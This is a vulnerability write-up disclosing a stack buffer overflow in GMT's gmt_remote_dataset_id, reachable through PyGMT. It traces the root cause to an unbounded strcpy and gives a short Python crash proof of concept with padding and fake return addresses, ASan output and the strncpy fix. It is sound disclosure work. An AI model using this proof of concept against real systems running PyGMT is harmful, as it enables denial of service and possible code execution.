Original advisory (GHSA): https://github.com/GenericMappingTools/gmt/security/advisories/GHSA-fqxx-62x7-9gwg
TL;DR
A stack-based buffer overflow in GMT (gmt_remote_dataset_id) can be triggered via PyGMT by supplying an oversized input.
This results in memory corruption and may lead to Remote Code Execution (RCE) depending on the environment.
Overview
While analyzing Generic Mapping Tools (GMT) and its Python binding PyGMT, I discovered a stack-based buffer overflow vulnerability.
The issue occurs due to unsafe use of strcpy without bounds checking in a C-level function.
Because PyGMT directly passes user input into GMT internals, this vulnerability becomes externally reachable.
Vulnerability Information
- Type: Stack Buffer Overflow → Potential RCE
- CWE: CWE-121
- Affected Version: 6.6.0
- Root Cause: Unsafe
strcpyusage
Background
Initially, I reported an SSRF issue in PyGMT. However, the maintainers clarified that URL handling is an intended feature inherited from GMT's design.
This response led to a key realization:
If input is intentionally unrestricted at the Python layer, the real attack surface likely exists in the underlying C library.
So I shifted the analysis target from PyGMT to GMT itself.
Discovery Process
The investigation focused on how user input flows through PyGMT into GMT.
The key entry point:
Session.call_module()This function forwards arguments directly into the GMT C API.
Hypothesis
"What happens if we pass an extremely long string?"
Test Payload
padding = "A" * 4096Result
- Program crashed with Segmentation Fault
- AddressSanitizer confirmed stack-buffer-overflow
Further code review identified the vulnerable function:
gmt_remote_dataset_id()Root Cause
The vulnerability originates from unsafe memory handling:
char file[PATH_MAX];
strcpy(file, input);Problem
inputis user-controlled- No length validation
- Fixed-size stack buffer
Result
If input exceeds PATH_MAX:
- Stack memory is overwritten
- Adjacent memory corruption occurs
Data Flow
User Input (PyGMT)
↓
Session.call_module()
↓
GMT module ("which")
↓
gmt_remote_dataset_id()
↓
strcpy() → stack buffer overflowThe critical issue is that no validation exists at any layer.
Exploitation
PoC
import struct
from pygmt.clib import Session
with Session() as lib:
padding = "A" * 4096
fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
payload = padding + fake_ret.decode("latin-1")
lib.call_module("which", [payload])Result
Segmentation faultAddressSanitizer Output
ERROR: AddressSanitizer: stack-buffer-overflow
Function: gmt_remote_dataset_idThis confirms that the crash is caused by out-of-bounds write on stack memory.
Impact
Direct Impact
- Application crash (DoS)
- Memory corruption
Advanced Impact
- Control flow hijacking
- Return address overwrite
- Potential Remote Code Execution (RCE)
Stack-based overflows are especially dangerous when combined with predictable memory layouts.
Attack Surface
This vulnerability is exploitable in:
- Applications using PyGMT
- Systems passing user input into GMT modules
- Automated geospatial data pipelines
Because the entry point is Python, exploitation becomes significantly easier than targeting C binaries directly.
Bypass Analysis
This is not a logic bypass — it is a missing validation issue.
Observed problems:
- Use of
strcpy(no bounds check) - No input length validation
- No defensive programming
Patch Analysis
The vulnerability was fixed by replacing unsafe copying logic.
Before
strcpy(file, input);After
strncpy(file, input, sizeof(file) - 1);
file[sizeof(file) - 1] = '\0';Key Improvements
- Enforces boundary checks
- Prevents buffer overflow
- Ensures null termination
This patch effectively mitigates the issue.
Why This Matters
This vulnerability highlights a critical misconception:
"High-level languages make things safe."
In reality:
- Python → passes input directly
- C → executes unsafe memory operations
This creates a hidden attack surface where safe-looking APIs expose unsafe internals.
Key Insight
High-level interfaces do not eliminate low-level vulnerabilities — they expose them.
Conclusion
This case demonstrates how a classic memory safety issue in C can become externally exploitable through modern language bindings.
Although it may initially appear as a crash-level bug, its impact can escalate significantly depending on runtime conditions.
Contribution
- Identified stack-based buffer overflow in GMT
- Demonstrated crash via PyGMT interface
- Confirmed memory corruption with ASan
- Analyzed root cause and patch
References
- GMT Security Advisory
- Patch Commit
- GHSA: Stack-based Buffer Overflow in
gmt_remote_dataset_id